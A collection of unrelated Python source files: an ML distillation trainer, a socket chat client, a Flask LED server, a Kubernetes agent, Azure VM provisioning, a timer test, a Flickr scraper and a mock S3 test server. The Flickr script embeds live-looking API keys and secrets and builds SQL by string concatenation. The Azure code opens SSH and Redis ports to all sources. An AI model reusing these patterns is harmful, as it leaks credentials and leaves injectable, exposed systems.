losses_log = losses[id-1]
p = threading.Thread(target=self.lit_sections[id].eval, args=(learner_output, target_feature, losses_log, criterion, lock))
jobs.append(p)
for job in jobs:
job.start()
for job in jobs:
job.join()
batch_time.update(time.time() - end)
end = time.time()
# Clean up
del inp, target, teacher_features, input_var, learner_output
return [loss.avg for loss in losses], data_time.avg, batch_time.avg
def _fine_tune_train_one_epoch(self, tag, optimizer, current_epoch, params = None):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
accuracies = AverageMeter()
# switch to appropriate mode
self.trainable_model.train()
self.base_model.eval()
criterion = self.fine_tuning_criterion
end = time.time()
data_loader = self.fine_tuning_loader
for i, (inp, target) in tqdm(enumerate(data_loader),
desc="Fine Tuning {tag}: Epoch {epoch}".format(tag = tag, epoch=current_epoch),
dynamic_ncols=True, total=len(data_loader), leave=True):
batch_size = target.size(0)
assert batch_size < 2**32, 'Size is too large! correct will overflow'
# measure data loading time
data_time.update(time.time() - end)
target_var = target.cuda(non_blocking = True)
input_var = inp.cuda() if not self.distributed else inp
# compute outputs and loss
with torch.no_grad():
teacher_outputs = self.base_model(input_var).detach().cuda(non_blocking = True)
learner_output = self.trainable_model(input_var).cuda()
loss = criterion(learner_output, teacher_outputs, target_var) * self.loss_scaling
if self.half:
self.trainable_model.zero_grad()
loss.backward()
fp16.set_grad(params, list(self.trainable_model.parameters()))
if self.loss_scaling != 1:
for param in params:
param.grad.data = param.grad.data/self.loss_scaling
optimizer.step()
fp16.copy_in_params(self.trainable_model, params)
else:
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Calculate vals for logging
losses.update(loss.item(), batch_size)
top_correct = correct(learner_output, target, top=(1, ))[0]
accuracies.update(top_correct.item() * (100. / batch_size), batch_size)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
del inp, target, loss, input_var, target_var, learner_output
return losses.avg, data_time.avg, batch_time.avg, accuracies.avg
def _fine_tune_evaluate_one_epoch(self, tag, current_epoch):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
accuracies = AverageMeter()
# switch to appropriate mode
self.trainable_model.eval()
self.base_model.eval()
criterion = self.fine_tuning_criterion
end = time.time()
data_loader = self.val_loader
with torch.no_grad():
for i, (inp, target) in tqdm(enumerate(data_loader),
desc="Evaluating {tag}: Epoch {epoch}".format(tag = tag, epoch=current_epoch),
dynamic_ncols=True, total=len(data_loader), leave=True):
batch_size = target.size(0)
assert batch_size < 2**32, 'Size is too large! correct will overflow'
# measure data loading time
data_time.update(time.time() - end)
target_var = target.cuda(non_blocking = True)
input_var = inp.cuda() if not self.distributed else inp
# compute outputs and loss
teacher_outputs = self.base_model(input_var).detach().cuda(non_blocking = True)
learner_output = self.trainable_model(input_var).cuda()
loss = criterion(learner_output, teacher_outputs, target_var) * self.loss_scaling
# Calculate vals for logging
losses.update(loss.item(), batch_size)
top_correct = correct(learner_output, target, top=(1, ))[0]
accuracies.update(top_correct.item() * (100. / batch_size), batch_size)
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
del input_var, target_var, inp, target, learner_output
return losses.avg, data_time.avg, batch_time.avg, accuracies.avg
def close_log_writer(self):
self.writer.close()
def validate_model(self):
# Load best trained model for validation
best_model = torch.load(os.path.join(self.save_dir, self.model_name))
try:
self.trainable_model.module.load_state_dict(best_model)
except:
self.trainable_model.load_state_dict(best_model)
self.trainable_model.cuda()
if isinstance(self.trainable_model, LearnerModelParallel):
self.trainable_model = self.trainable_model.module
t_losses = AverageMeter()
t_accuracy = AverageMeter()
criterion = nn.CrossEntropyLoss()
# switch to appropriate mode
self.trainable_model.eval()
# self.base_model.eval()
with torch.no_grad():
for i, (input, target) in tqdm(enumerate(self.val_loader), desc='Validating Model for Benchmark',
dynamic_ncols=True, total= len(self.val_loader)):
batch_size = target.size(0)
assert batch_size < 2**32, 'Size is too large! correct will overflow'
input = input.cuda()
target_var = target.cuda(non_blocking=True)
# compute outputs
t_output = self.trainable_model(input)
t_loss = criterion(t_output.cuda() + 1e-16, target_var)
# Calculate vals for logging
t_losses.update(t_loss.item(), input.size(0))
top_correct = correct(t_output, target, top=(1, ))[0]
t_accuracy.update(top_correct.item() * (100. / batch_size), batch_size)
return t_losses.avg, t_accuracy.avg
def _unfreeze_training_model_sections(self, *sections):
for i in sections:
for param in self.lit_sections[i].network.parameters():
param.requires_grad = True
def _freeze_training_model_sections(self, *sections):
for i in sections:
for param in self.lit_sections[i].network.parameters():
param.requires_grad = False
|
vChat2.0.py
|
#coding:utf-8
from socket import *
import time, threading
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
serverName = '118.89.229.68';
sendPort = 12001;
receivePort = 12002;
checkPort = 12003;
userName = "";
key = "";
pwd = "";
def sendThread():
while 1:
sentence = raw_input();
sentence += "_";
sentence += userName;
sentence += "_";
sentence += key;
sentence += "_";
sentence += pwd;
clientSocket = socket(AF_INET, SOCK_STREAM);
clientSocket.connect((serverName, sendPort));
sentence=sentence.decode('GBK').encode('UTF-8');
clientSocket.send(sentence);
checker = clientSocket.recv(2048);
if (checker=="fuck"):
print("\n!!!Don't try to cheat!!!\n");
clientSocket.close();
def receiveThread():
while 1:
time.sleep(0.5);
monitorSocket = socket(AF_INET, SOCK_STREAM);
monitorSocket.connect((serverName, receivePort));
sentence=key+"_"+userName+"_"+pwd;
sentence=sentence.decode('GBK').encode('UTF-8');
monitorSocket.send(sentence);
relay = monitorSocket.recv(2048);
if relay:
relay=relay.decode('UTF-8').encode('GBK');
print ">>>"+relay;
monitorSocket.close();
while 1:
# 0->succuss, 1->wrong pwd, 2-> wrong room keyword
userName = raw_input("Your name: ");
key = raw_input("Chat room keyword: ");
pwd = raw_input("Your own keyword: ");
clientSocket = socket(AF_INET, SOCK_STREAM);
clientSocket.connect((serverName, checkPort));
sentence=key+"_"+userName+"_"+pwd;
sentence=sentence.decode('GBK').encode('UTF-8');
clientSocket.send(sentence);
relay = clientSocket.recv(2048);
clientSocket.close();
if relay == "0":
print (">>>Welcome to vChat!\n");
t1 = threading.Thread(target=sendThread);
t2 = threading.Thread(target=receiveThread);
t1.start();
t2.start();
t1.join();
t2.join();
break;
elif relay == "1":
print ("! Wrong pwd");
else:
print ("! Wrong room keyword");
raw_input("Press any key to continue...");
|
server.py
|
from flask import Flask, render_template, redirect, request
import string
import signal
import sys
from threading import Thread
import control
app = Flask(__name__)
current_function = None
controller = control.Control()
control_thread = None
@app.route('/')
def index():
return render_template('index.html', function=current_function)
@app.route('/white', methods=['GET'])
def white():
# Set function
global current_function
current_function = "White"
# Execute function
global control_thread
if control_thread:
controller.running = False
control_thread.join(0.1)
controller.running = True
control_thread = Thread(target=controller.color, args=(255, 255, 255))
control_thread.start()
return redirect('/', code=302)
@app.route('/color_temp', methods=['GET'])
def color_temp():
# Get and parse data
temp = str(request.args['color_temp'])
if temp.isdigit() and 500 <= int(temp) <= 20000:
temp = int(temp)
else:
temp = 5500
# Set function
global current_function
current_function = "Color Temperature {}".format(temp)
# Execute function
global control_thread
if control_thread:
controller.running = False
control_thread.join(0.1)
controller.running = True
control_thread = Thread(target=controller.color_temp, args=(temp,))
control_thread.start()
return redirect('/', code=302)
@app.route('/color', methods=['GET'])
def color():
# Get and parse data
rgb = str(request.args['color']).lstrip('#')
if len(rgb) == 6 and all(c in string.hexdigits for c in rgb):
rgb = tuple(int(rgb[i:i + 2], 16) for i in (0, 2, 4))
else:
rgb = (255, 255, 255)
# Set function
global current_function
current_function = "RGB Color ({}, {}, {})".format(*rgb)
# Execute function
global control_thread
if control_thread:
controller.running = False
control_thread.join(0.1)
controller.running = True
control_thread = Thread(target=controller.color, args=rgb)
control_thread.start()
return redirect('/', code=302)
@app.route('/rainbow', methods=['GET'])
def rainbow():
# Set function
global current_function
current_function = "Rainbow"
# Execute function
global control_thread
if control_thread:
controller.running = False
control_thread.join(0.1)
controller.running = True
control_thread = Thread(target=controller.rainbow)
control_thread.start()
return redirect('/', code=302)
@app.route('/rainbow_onecolor', methods=['GET'])
def rainbow_onecolor():
# Set function
global current_function
current_function = "Rainbow with single color"
# Execute function
global control_thread
if control_thread:
controller.running = False
control_thread.join(0.1)
controller.running = True
control_thread = Thread(target=controller.rainbow_onecolor)
control_thread.start()
return redirect('/', code=302)
def signal_handler(signal, frame):
print('Exiting...')
if control_thread:
controller.running = False
control_thread.join(0.1)
sys.exit(0)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
app.debug = False
app.run(host='0.0.0.0', port=80)
|
main.py
|
# -*- coding: utf-8 -*-
"""Persistence agent."""
import argparse
import os
import sys
import threading
from kubernetes import client
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from projects.agent.logger import DEFAULT_LOG_LEVEL
from projects.agent.watchers.deployment import watch_seldon_deployments
from projects.agent.watchers.workflow import watch_workflows
from projects.kubernetes.kube_config import load_kube_config
DB_HOST = os.getenv("MYSQL_DB_HOST", "mysql.platiagro")
DB_NAME = os.getenv("MYSQL_DB_NAME", "platiagro")
DB_USER = os.getenv("MYSQL_DB_USER", "root")
DB_PASS = os.getenv("MYSQL_DB_PASSWORD", "")
DB_URL = f"mysql+pymysql://{DB_USER}:{DB_PASS}@{DB_HOST}/{DB_NAME}"
engine = create_engine(DB_URL,
pool_size=5,
pool_recycle=300,
max_overflow=10)
session = scoped_session(sessionmaker(autocommit=False,
autoflush=False,
bind=engine))
def run(**kwargs):
"""
Watches kubernetes events and saves relevant data.
"""
load_kube_config()
api = client.CustomObjectsApi()
log_level = kwargs.get("log_level", DEFAULT_LOG_LEVEL)
workflows_thread = threading.Thread(target=watch_workflows, args=(api, session), kwargs={"log_level": log_level})
sdeps_thread = threading.Thread(target=watch_seldon_deployments, args=(api, session), kwargs={"log_level": log_level})
workflows_thread.start()
sdeps_thread.start()
def parse_args(args):
"""Takes argv and parses API options."""
parser = argparse.ArgumentParser(
description="Persistence Agent"
)
parser.add_argument(
"--debug", action="count", help="Enable debug"
)
parser.add_argument(
"--log-level",
nargs="?",
choices=["NOTSET", "DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"],
default=DEFAULT_LOG_LEVEL,
const=DEFAULT_LOG_LEVEL,
help="Sets log level to logging"
)
return parser.parse_args(args)
if __name__ == "__main__":
args = parse_args(sys.argv[1:])
log_level = args.log_level
if args.debug:
engine.echo = True
run(log_level=log_level)
|
azure_util.py
|
from azure.identity import AzureCliCredential
from azure.identity._credentials import azure_cli
from azure.mgmt.resource import ResourceManagementClient
from azure.mgmt.network import NetworkManagementClient
from azure.mgmt.compute import ComputeManagementClient
from azure.mgmt.network.v2020_06_01.models import NetworkSecurityGroup
from azure.mgmt.network.v2020_06_01.models import SecurityRule
import os
import threading
from tqdm import tqdm
sgx_1_core = "Standard_DC1s_v2"
sgx_2_core = "Standard_DC2s_v2"
sgx_4_core = "Standard_DC4s_v2"
sgx_8_core = "Standard_DC8s_v2"
RESOURCE_GROUP_NAME = "scalable_oram_resource_group"
VNET_NAME = "scalable_oram_vnet"
SUBNET_NAME = "scalable_oram_subnet"
IP_NAME = "scalable_oram_ip"
IP_CONFIG_NAME = "scalable_oram_ip_config"
SEC_GROUP_NAME = "scalable_oram_sec_group"
NIC_NAME = "scalable_oram_nic"
USERNAME = "azureuser"
DEFAULT_PASSWORD = "scalable_oram"
LOCATION = "eastus"
print_lock = threading.Lock()
azure_cli_lock = threading.Lock()
pbar_lock = threading.Lock()
class AzureSetup:
def __init__(self, resource_group_name):
self.name = resource_group_name
self.resource_group_name = "%s_resource_group" % resource_group_name
self.vnet_name = "%s_vnet" % resource_group_name
self.subnet_name = "%s_subnet" % resource_group_name
self.ip_name = "%s_ip" % resource_group_name
self.ip_config_name = "%s_ip_config" % resource_group_name
self.sec_group_name = "%s_sec_group" % resource_group_name
self.nic_name = "%s_nic" % resource_group_name
def runAzureSetup(self, location):
credential = AzureCliCredential()
self.subscription_id = os.environ["AZURE_SUBSCRIPTION_ID"]
resource_client = ResourceManagementClient(credential, self.subscription_id)
rg_result = resource_client.resource_groups.create_or_update(self.resource_group_name,
{
"location": location
}
)
print((("Provisioned resource group %s in the %s region") % (rg_result.name, rg_result.location)))
compute_client = ComputeManagementClient(credential, self.subscription_id)
network_client = NetworkManagementClient(credential, self.subscription_id)
self.initializeResourceGroup(network_client, location)
return compute_client, network_client
def cleanupAzure(self):
credential = AzureCliCredential()
self.subscription_id = os.environ["AZURE_SUBSCRIPTION_ID"]
resource_client = ResourceManagementClient(credential, self.subscription_id)
poller = resource_client.resource_groups.begin_delete(self.resource_group_name)
result = poller.result()
print((("Deleted resource group %s") % (self.resource_group_name)))
def initializeResourceGroup(self, network_client, location):
# Provision the virtual network and wait for completion
poller = network_client.virtual_networks.begin_create_or_update(self.resource_group_name,
self.vnet_name,
{
"location": location,
"address_space": {
"address_prefixes": ["10.0.0.0/16"]
}
}
)
vnet_result = poller.result()
with print_lock:
print("Provisioned virtual network %s with address prefixes %s" % (vnet_result.name, vnet_result.address_space.address_prefixes))
# Step 3: Provision the subnet and wait for completion
poller = network_client.subnets.begin_create_or_update(self.resource_group_name,
self.vnet_name, self.subnet_name,
{ "address_prefix": "10.0.0.0/24" }
)
self.subnet_result = poller.result()
with print_lock:
print("Provisioned virtual subnet %s with address prefix %s" % (self.subnet_result.name, self.subnet_result.address_prefix))
poller = network_client.network_security_groups.begin_create_or_update(self.resource_group_name,
self.sec_group_name,
{
"location": location,
"security_rules": [
{
"name": "ssh",
"properties": {
"Protocol": "Tcp",
"Description": "allow SSH",
"SourceAddressPrefix": "*",
"SourcePortRange": "*",
"DestinationPortRange": "22",
"Priority": 100,
"DestinationAddressPrefix": "*",
"Access": "Allow",
"Direction": "Inbound",
}
},
{
"name": "application",
"properties": {
"Protocol": "Tcp",
"Description": "allow application",
"SourceAddressPrefix": "*",
"SourcePortRange": "*",
"DestinationPortRange": "12345",
"Priority": 101,
"DestinationAddressPrefix": "*",
"Access": "Allow",
"Direction": "Inbound",
}
},
{
"name": "application2",
"properties": {
"Protocol": "Tcp",
"Description": "allow application",
"SourceAddressPrefix": "*",
"SourcePortRange": "*",
"DestinationPortRange": "12346",
"Priority": 102,
"DestinationAddressPrefix": "*",
"Access": "Allow",
"Direction": "Inbound",
}
},
{
"name": "redis-clients",
"properties": {
"Protocol": "Tcp",
"Description": "allow application",
"SourceAddressPrefix": "*",
"SourcePortRange": "*",
"DestinationPortRange": "6379",
"Priority": 103,
"DestinationAddressPrefix": "*",
"Access": "Allow",
"Direction": "Inbound",
}
},
{
"name": "redis-cluster-bus",
"properties": {
"Protocol": "Tcp",
"Description": "allow application",
"SourceAddressPrefix": "*",
"SourcePortRange": "*",
"DestinationPortRange": "16379",
"Priority": 104,
"DestinationAddressPrefix": "*",
"Access": "Allow",
"Direction": "Inbound",
}
}
]
}
)
self.sec_group_result = poller.result()
def startAzureInstance(self, compute_client, network_client, name, instance_type, location, image_path, ssh_key_data, pbar):
ip_name = self.ip_name + "_" + name
ip_config_name = self.ip_config_name + "_" + name
nic_name = self.nic_name + "_" + name
vm_name = self.name + "_" + name
vm_name = vm_name.replace("_", "-") # azure gets mad if the name has _ in it
# Step 4: Provision an IP address and wait for completion
with azure_cli_lock:
poller = network_client.public_ip_addresses.begin_create_or_update(self.resource_group_name,
ip_name,
{
"location": location,
"sku": { "name": "Standard" },
"public_ip_allocation_method": "Static",
"public_ip_address_version" : "IPV4"
}
)
ip_address_result = poller.result()
with pbar_lock:
pbar.update(1)
with print_lock:
tqdm.write("Provisioned public IP address %s with address %s" % (ip_address_result.name, ip_address_result.ip_address))
#security_rule = SecurityRule(protocol='Tcp', source_address_prefix='Internet',
# source_port_range="*", destination_port_range="22", priority=100,
# destination_address_prefix='*', access='Allow', direction='Inbound')
#nsg_params = NetworkSecurityGroup(id=sec_group_name, location=location, security_rules=[security_rule])
# Step 5: Provision the network interface client
with azure_cli_lock:
poller = network_client.network_interfaces.begin_create_or_update(self.resource_group_name,
nic_name,
{
"location": location,
"ip_configurations": [ {
"name": ip_config_name,
"subnet": { "id": self.subnet_result.id },
"public_ip_address": {"id": ip_address_result.id }
}],
"network_security_group": {
"id": self.sec_group_result.id
}
}
)
nic_result = poller.result()
with pbar_lock:
pbar.update(1)
with print_lock:
tqdm.write("Provisioned network interface client %s" % (nic_result.name))
#print((("Provisioning virtual machine %s; this operation might take a few minutes.") % (vm_name)))
with azure_cli_lock:
poller = compute_client.virtual_machines.begin_create_or_update(self.resource_group_name, vm_name,
{
"location": location,
"storage_profile": {
"image_reference": {
"id": "/subscriptions/{}/{}".format(self.subscription_id, image_path),
}
},
"hardware_profile": {
"vm_size": instance_type
},
"os_profile": {
"computer_name": vm_name,
"admin_username": USERNAME,
"linux_configuration": {
"disablePasswordAuthentication": True,
"ssh": {
"public_keys": [{
"path": "/home/{}/.ssh/authorized_keys".format(USERNAME),
"key_data": ssh_key_data
}]
}
}
},
"network_profile": {
"network_interfaces": [{
"id": nic_result.id,
}]
}
})
#vm_result = poller.result()
with pbar_lock:
pbar.update(1)
with print_lock:
tqdm.write("Began provisioning virtual machine %s" % (vm_name))
return poller, ip_address_result.ip_address, nic_result.ip_configurations[0].private_ip_address
def startAzureInstances(self, compute_client, network_client, name_prefix, instance_type, location, image_path, ssh_key_data, num):
vm_list = []
ip_list = []
private_ip_list = []
for i in range(num):
name = name_prefix + str(i)
vm_poller, ip, private_ip = self.startAzureInstance(compute_client, network_client, name, instance_type, location, image_path, ssh_key_data, pbar)
vm_list.append(vm_poller)
ip_list.append(ip)
private_ip_list.append(private_ip)
for i in range(num):
vm_list[i].result()
print((("Provisioned virtual machine %s") % name))
return vm_list, ip_list, private_ip_list
def startAzureInstancesAsync(self, compute_client, network_client, name_prefix, instance_type, location, image_path, ssh_key_data, num, result_queue, pbar):
threads = []
def startInstance(name):
result_queue.put(self.startAzureInstance(compute_client, network_client, name, instance_type, location, image_path, ssh_key_data, pbar))
for i in range(num):
name = name_prefix + str(i)
t = threading.Thread(target=startInstance, args=(name,))
t.start()
threads.append(t)
return threads
def terminateAzureInstance(self, client, vm):
client.virtual_machines.deallocate(self.resource_group_name, vm.name)
print((("Terminated virtual machine %s") % (vm.name)))
def terminateAzureInstances(self, client, vm_list):
for vm in vm_list:
self.terminateAzureInstance(client, vm.name)
print("Terminated all instances")
|
local_timer_example.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import logging
import multiprocessing as mp
import signal
import time
import unittest
import torch.multiprocessing as torch_mp
import torchelastic.timer as timer
from test_utils import is_asan_or_tsan, is_tsan
logging.basicConfig(
level=logging.INFO, format="[%(levelname)s] %(asctime)s %(module)s: %(message)s"
)
def _happy_function(rank, mp_queue):
timer.configure(timer.LocalTimerClient(mp_queue))
with timer.expires(after=1):
time.sleep(0.5)
def _stuck_function(rank, mp_queue):
timer.configure(timer.LocalTimerClient(mp_queue))
with timer.expires(after=1):
time.sleep(5)
class LocalTimerExample(unittest.TestCase):
"""
Demonstrates how to use LocalTimerServer and LocalTimerClient
to enforce expiration of code-blocks.
Since torch multiprocessing's ``start_process`` method currently
does not take the multiprocessing context as parameter argument
there is no way to create the mp.Queue in the correct
context BEFORE spawning child processes. Once the ``start_process``
API is changed in torch, then re-enable ``test_torch_mp_example``
unittest. As of now this will SIGSEGV.
"""
@unittest.skipIf(is_asan_or_tsan(), "test is a/tsan incompatible")
def test_torch_mp_example(self):
# in practice set the max_interval to a larger value (e.g. 60 seconds)
mp_queue = mp.get_context("spawn").Queue()
server = timer.LocalTimerServer(mp_queue, max_interval=0.01)
server.start()
world_size = 8
# all processes should complete successfully
# since start_process does NOT take context as parameter argument yet
# this method WILL FAIL (hence the test is disabled)
torch_mp.spawn(
fn=_happy_function, args=(mp_queue,), nprocs=world_size, join=True
)
with self.assertRaises(Exception):
# torch.multiprocessing.spawn kills all sub-procs
# if one of them gets killed
torch_mp.spawn(
fn=_stuck_function, args=(mp_queue,), nprocs=world_size, join=True
)
server.stop()
@unittest.skipIf(is_asan_or_tsan(), "test is a/tsan incompatible")
def test_example_start_method_spawn(self):
self._run_example_with(start_method="spawn")
@unittest.skipIf(is_asan_or_tsan(), "test is a/tsan incompatible")
def test_example_start_method_forkserver(self):
self._run_example_with(start_method="forkserver")
@unittest.skipIf(is_tsan(), "test is tsan incompatible")
def test_example_start_method_fork(self):
self._run_example_with(start_method="fork")
def _run_example_with(self, start_method):
spawn_ctx = mp.get_context(start_method)
mp_queue = spawn_ctx.Queue()
server = timer.LocalTimerServer(mp_queue, max_interval=0.01)
server.start()
world_size = 8
processes = []
for i in range(0, world_size):
if i % 2 == 0:
p = spawn_ctx.Process(target=_stuck_function, args=(i, mp_queue))
else:
p = spawn_ctx.Process(target=_happy_function, args=(i, mp_queue))
p.start()
processes.append(p)
for i in range(0, world_size):
p = processes[i]
p.join()
if i % 2 == 0:
self.assertEqual(-signal.SIGKILL, p.exitcode)
else:
self.assertEqual(0, p.exitcode)
server.stop()
|
get_photo_info.py
|
import flickrapi
import psycopg2
import threading
import traceback
from ast import literal_eval
import json
def data_walker(method, searchstring='*/photo', **params):
"""Calls 'method' with page=0, page=1 etc. until the total
number of pages has been visited. Yields the photos
returned.
Assumes that ``method(page=n, **params).findall(searchstring)``
results in a list of interesting elements (defaulting to photos),
and that the toplevel element of the result contains a 'pages'
attribute with the total number of pages.
"""
page = 1
total = 1 # We don't know that yet, update when needed
while page <= total:
# Fetch a single page of photos
# LOG.debug('Calling %s(page=%i of %i, %s)' %
# (method.func_name, page, total, params))
rsp = method(page=page, **params)
photoset = rsp.getchildren()[0]
total = int(photoset.get('pages'))
photos = rsp.findall(searchstring)
# Yield each photo
for photo in photos:
yield photo
# Ready to get the next page
page += 1
def addslashes(s):
d = {'"':'\\"', "'":"''", "\0":"\\\0", "\\":"\\\\"}
return ''.join(d.get(c, c) for c in s)
def get_image_loc(api_key,api_secret,record,out_file):
# try:
# conn = psycopg2.connect("dbname='flickr2' user='postgres' host='129.219.60.22' password='password'")
# print "Successfully connected...."
# except:
# pass
# cur = conn.cursor()
flickr = flickrapi.FlickrAPI(api_key, api_secret,format='json')
# out_file = open("lat_long_train2.txt", 'w')
# out_file.write("test")
photoid,_ = literal_eval(record)
# photoid = '34186307736'
# photoid = record[0]
# userid = '62202285@N00'
try:
# image_metadata = data_walker(flickr.photos.geo.getLocation,searchstring=,
# per_page=1000, photo_id= photoid)
image_metadata = flickr.photos.geo.getLocation(photo_id=photoid,format='json')
"""
<photo id="32948082713" owner="62202285@N00" secret="1aaa122f05" server="3940" farm="4" title="Fleurs sauvages...!!!" ispublic="1" isfriend="0" isfamily="0" />
"""
image_metadata = json.loads(image_metadata)
latitude = image_metadata['photo']['location']['latitude']
longitude = image_metadata['photo']['location']['longitude']
neighbourhood = image_metadata['photo']['location']['neighbourhood']['_content']
locality = image_metadata['photo']['location']['locality']['_content']
county = image_metadata['photo']['location']['county']['_content']
region = image_metadata['photo']['location']['region']['_content']
country = image_metadata['photo']['location']['country']['_content']
# print image_metadata['photo']['location']['county']['_content']
st = "Insert into image_loc_info2 (photo_id,latitude,longitude,neighbourhood,locality,county,region,country) values "\
+ "('"+photoid+"',"\
+latitude+","\
+longitude+",'"\
+addslashes(neighbourhood)+"','"\
+addslashes(locality)+"','" \
+ addslashes(county) + "','" \
+addslashes(region)+"','"\
+addslashes(country)+"')"
print st
tup = (photoid,latitude,longitude)
out_file.write(str(tup) + "\n")
# try:
# cur.execute(st)
# except:
# traceback.print_exc()
# pass
# print tup > out_file
except:
# traceback.print_exc()
print "location not found!! ",photoid
# conn.close()
def main():
count = 0
api_keys = [u'50447f832b7d99785ebb9ba9b69e6a65',u'82764a924643a98e49381f5f28a9a5a7',u'36eadd83335122d888da119424854efc',u'51da9f4ccbd1dae169eb1e619690530e',u'5ebfd342ebab8ea6b16fbbfe6daf632e']
api_secrets = [u'11d5ef95815b96b0',u'39c68f2dd019d2c0',u'2bbc80b7476185c5',u'5c473c8f547f07d6',u'1e9c1b2440923add']
# api_key = u'50447f832b7d99785ebb9ba9b69e6a65'
# api_secret = u'11d5ef95815b96b0'
import csv
fil = open('new_photo_ids_test_100.txt', 'r')
records = fil.readlines()
# records = records[1:]
out_file = open('lat_long_mt_test.txt','a')
num_threads = 10
threads = []
while count < len(records):
if threading.active_count() <= num_threads:
print count
# print "Number of threads: ",threading.active_count()
t = threading.Thread(target=get_image_loc,args=(api_keys[count%5],api_secrets[count%5],records[count],out_file))
threads.append(t)
t.start()
count += 1
# for x in threads:
# if threading.active_count() <= num_threads:
# x.start()
# Wait for all of them to finish
for x in threads:
x.join()
out_file.close()
# get_image_loc(api_keys[count%5],api_secrets[count%5],records)
if __name__ == '__main__':
main()
|
server.py
|
try:
from BaseHTTPServer import BaseHTTPRequestHandler
except ImportError:
from http.server import BaseHTTPRequestHandler
try:
from BaseHTTPServer import HTTPServer
except ImportError:
from http.server import HTTPServer
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
import json
import logging
import os
import socket
import sys
import threading
import time
import uuid
import xml.etree.ElementTree
BASE_DIR = os.path.dirname(__file__)
logging.getLogger().setLevel(logging.INFO)
file_handler = logging.FileHandler(os.path.join(BASE_DIR, "test-server.log"), "a", encoding="utf-8")
file_handler.setFormatter(logging.Formatter("%(asctime)s %(message)s"))
logging.getLogger().addHandler(file_handler)
logging.getLogger().addHandler(logging.StreamHandler())
communication_port = int(sys.argv[1])
bucket = sys.argv[2]
def GetFreeTCPPortsAndIP(n):
result = []
sockets = []
for i in range(n):
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.bind((socket.gethostname(), 0))
addr, port = tcp.getsockname()
result.append(port)
sockets.append(tcp)
[ s.close() for s in sockets ]
return result, addr
(
redirecting_to_http_port,
simple_server_port,
preserving_data_port,
multipart_preserving_data_port,
redirecting_preserving_data_port
), localhost = GetFreeTCPPortsAndIP(5)
data = {
"redirecting_to_http_port": redirecting_to_http_port,
"preserving_data_port": preserving_data_port,
"multipart_preserving_data_port": multipart_preserving_data_port,
"redirecting_preserving_data_port": redirecting_preserving_data_port,
}
class SimpleHTTPServerHandler(BaseHTTPRequestHandler):
def do_GET(self):
logging.info("GET {}".format(self.path))
if self.path == "/milovidov/test.csv":
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
data["redirect_csv_data"] = [[42, 87, 44], [55, 33, 81], [1, 0, 9]]
self.wfile.write("".join([ "{},{},{}\n".format(*row) for row in data["redirect_csv_data"]]))
else:
self.send_response(404)
self.end_headers()
self.finish()
class RedirectingToHTTPHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(307)
self.send_header("Content-type", "text/xml")
self.send_header("Location", "http://{}:{}/milovidov/test.csv".format(localhost, simple_server_port))
self.end_headers()
self.wfile.write(r"""<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>TemporaryRedirect</Code>
<Message>Please re-send this request to the specified temporary endpoint.
Continue to use the original request endpoint for future requests.</Message>
<Endpoint>storage.yandexcloud.net</Endpoint>
</Error>""".encode())
self.finish()
class PreservingDataHandler(BaseHTTPRequestHandler):
protocol_version = "HTTP/1.1"
def parse_request(self):
result = BaseHTTPRequestHandler.parse_request(self)
# Adaptation to Python 3.
if sys.version_info.major == 2 and result == True:
expect = self.headers.get("Expect", "")
if (expect.lower() == "100-continue" and self.protocol_version >= "HTTP/1.1" and self.request_version >= "HTTP/1.1"):
if not self.handle_expect_100():
return False
return result
def send_response_only(self, code, message=None):
if message is None:
if code in self.responses:
message = self.responses[code][0]
else:
message = ""
if self.request_version != "HTTP/0.9":
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, code, message))
def handle_expect_100(self):
logging.info("Received Expect-100")
self.send_response_only(100)
self.end_headers()
return True
def do_POST(self):
self.send_response(200)
query = urlparse.urlparse(self.path).query
logging.info("PreservingDataHandler POST ?" + query)
if query == "uploads":
post_data = r"""<?xml version="1.0" encoding="UTF-8"?>
<hi><UploadId>TEST</UploadId></hi>""".encode()
self.send_header("Content-length", str(len(post_data)))
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(post_data)
else:
post_data = self.rfile.read(int(self.headers.get("Content-Length")))
self.send_header("Content-type", "text/plain")
self.end_headers()
data["received_data_completed"] = True
data["finalize_data"] = post_data
data["finalize_data_query"] = query
self.finish()
def do_PUT(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("ETag", "hello-etag")
self.end_headers()
query = urlparse.urlparse(self.path).query
path = urlparse.urlparse(self.path).path
logging.info("Content-Length = " + self.headers.get("Content-Length"))
logging.info("PUT " + query)
assert self.headers.get("Content-Length")
assert self.headers["Expect"] == "100-continue"
put_data = self.rfile.read()
data.setdefault("received_data", []).append(put_data)
logging.info("PUT to {}".format(path))
self.server.storage[path] = put_data
self.finish()
def do_GET(self):
path = urlparse.urlparse(self.path).path
if path in self.server.storage:
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.send_header("Content-length", str(len(self.server.storage[path])))
self.end_headers()
self.wfile.write(self.server.storage[path])
else:
self.send_response(404)
self.end_headers()
self.finish()
class MultipartPreservingDataHandler(BaseHTTPRequestHandler):
protocol_version = "HTTP/1.1"
def parse_request(self):
result = BaseHTTPRequestHandler.parse_request(self)
# Adaptation to Python 3.
if sys.version_info.major == 2 and result == True:
expect = self.headers.get("Expect", "")
if (expect.lower() == "100-continue" and self.protocol_version >= "HTTP/1.1" and self.request_version >= "HTTP/1.1"):
if not self.handle_expect_100():
return False
return result
def send_response_only(self, code, message=None):
if message is None:
if code in self.responses:
message = self.responses[code][0]
else:
message = ""
if self.request_version != "HTTP/0.9":
